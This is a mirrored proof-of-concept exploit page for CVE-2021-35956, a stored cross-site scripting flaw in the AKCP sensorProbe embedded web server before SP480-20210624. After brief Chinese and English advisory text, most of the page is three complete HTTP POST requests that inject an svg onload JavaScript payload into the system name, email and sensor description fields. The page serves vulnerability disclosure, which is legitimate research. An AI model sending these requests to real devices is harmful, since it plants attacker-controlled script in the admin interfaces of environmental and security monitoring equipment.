Associated Vulnerability
Title:AKCP sensorProbe 跨站脚本漏洞 (CVE-2021-35956)Description:AKCP sensorProbe是美国AKCP公司的一个平台独立的环境和安全监控设备。只需分配 IP 地址并连接到嵌入式网络服务器。 AKCP sensorProbe 嵌入式网络服务器SP480-20210624之前版本存在跨站脚本漏洞,该漏洞允许远程攻击者通过传感器描述、电子邮件(发件人/收件人/抄送)、系统名称和系统位置字段引入任意 JavaScript。
Description
Proof of Concept Exploit for CVE-2021-35956, AKCP sensorProbe - 'Multiple' Cross Site Scripting (XSS)
Readme
# CVE-2021-35956.
Proof of Concept Exploit for CVE-2021-35956, AKCP sensorProbe - 'Multiple' Cross Site Scripting (XSS).
**Exploit Title:** AKCP sensorProbe - 'Multiple' Cross Site Scripting (XSS).
**Date:** 07-01-2021.
**Exploit Author:** Tyler Butler.
**Vendor Homepage:** https://www.akcp.com/.
**Software Link:** https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/.
**Advisory:** https://tbutler.org/2021/06/28/cve-2021-35956.
**Version:** < SP480-20210624.
**CVE:** CVE-2021-35956.
**Description:** Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
1) Stored Cross-Site Scripting via System Settings
```yaml
POST /system?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/system?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
```
2) Stored Cross-Site Scripting via Email Settings
```yaml
POST /mail?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/mail?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save
```
3) Stored Cross-Site Scripting via Sensor Description
```yaml
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CPCookie=sensors=400
Connection: close
_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
```
File Snapshot
[4.0K] /data/pocs/a19277bf08c5edd9c586f85b9d32aa431b534c0b
└── [3.2K] README.md
0 directories, 1 file
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.